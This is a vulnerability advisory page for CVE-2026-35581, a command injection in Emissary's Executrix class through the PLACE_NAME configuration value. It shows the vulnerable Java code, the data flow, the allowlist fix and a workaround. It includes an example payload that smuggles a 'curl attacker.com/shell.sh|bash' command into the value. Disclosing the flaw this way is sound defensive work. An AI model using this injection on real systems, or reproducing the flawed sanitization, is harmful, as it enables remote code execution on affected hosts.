Get a Demo

Let's Patch It!

Book a short call with one our specialists, we'll walk you through how Endor Patches work, and ask you a few questions about your environment (like your primary programming languages and repository management). We'll also send you an email right after you fill out the form, feel free to reply with any questions you have in advance!

CVE

CVE-2026-35581

Emissary has a Command Injection via PLACE_NAME Configuration in Executrix
Back to all
CVE

CVE-2026-35581

Emissary has a Command Injection via PLACE_NAME Configuration in Executrix

Summary

The Executrix utility class constructed shell commands by concatenating

configuration-derived values — including the PLACE_NAME parameter — with

insufficient sanitization. Only spaces were replaced with underscores, allowing

shell metacharacters (;|$ ` (), etc.) to pass through

into /bin/sh -c command execution.

Details

Vulnerable code — Executrix.java

Insufficient sanitization (line 132):

this.placeName = this.placeName.replace(' ', '_');
// ONLY replaces spaces — shell metacharacters pass through

Shell sink (line 1052–1058):

protected String[] getTimedCommand(final String c) {
    return new String[] {"/bin/sh", "-c", "ulimit -c 0; cd " + tmpNames[DIR] + "; " + c};
}

Data flow

  1. PLACE_NAME is read from a configuration file
  2. Executrix applies only a space-to-underscore replacement
  3. The placeName is used to construct temporary directory paths (tmpNames[DIR])
  4. tmpNames[DIR] is concatenated into a shell command string
  5. The command is executed via /bin/sh -c

Example payload

PLACE_NAME = "test;curl attacker.com/shell.sh|bash;x"

After the original sanitization: test;curl_attacker.com/shell.sh|bash;x

(semicolons, pipes, and other metacharacters preserved)

Impact

  • Arbitrary command execution on the Emissary host
  • Requires the ability to control configuration values (e.g., administrative

  access or a compromised configuration source)

Remediation

Fixed in PR #1290,

merged into release 8.39.0.

The space-only replacement was replaced with an allowlist regex that strips all

characters not matching [a-zA-Z0-9_-]:

protected static final Pattern INVALID_PLACE_NAME_CHARS = Pattern.compile("[^a-zA-Z0-9_-]");
protected static String cleanPlaceName(final String placeName) {
    return INVALID_PLACE_NAME_CHARS.matcher(placeName).replaceAll("_");
}

This ensures that any shell metacharacter in the PLACE_NAME configuration

value is replaced with an underscore before it can reach a command string.

Tests were added to verify that parentheses, slashes, dots, hash, dollar signs,

backslashes, quotes, semicolons, carets, and at-signs are all sanitized.

Workarounds

If upgrading is not immediately possible, ensure that PLACE_NAME values in all

configuration files contain only alphanumeric characters, underscores, and hyphens.

References

Package Versions Affected

Package Version
patch Availability
No items found.

Automatically patch vulnerabilities without upgrading

Fix Without Upgrading
Detect compatible fix
Apply safe remediation
Fix with a single pull request

CVSS Version

Severity
Base Score
CVSS Version
Score Vector
C
H
U
7.2
-
3.1
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
C
H
U
0
-
3.1
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
C
H
U
-

Related Resources

No items found.

References

https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-6c37-7w4p-jg9v, https://nvd.nist.gov/vuln/detail/CVE-2026-35581, https://github.com/NationalSecurityAgency/emissary/pull/1290, https://github.com/NationalSecurityAgency/emissary

Severity

7.2

CVSS Score
0
10

Basic Information

Ecosystem
Base CVSS
7.2
EPSS Probability
0.00129%
EPSS Percentile
0.31931%
Introduced Version
0
Fix Available
8.39.0

Fix Critical Vulnerabilities Instantly

Secure your app without upgrading.
Fix Without Upgrading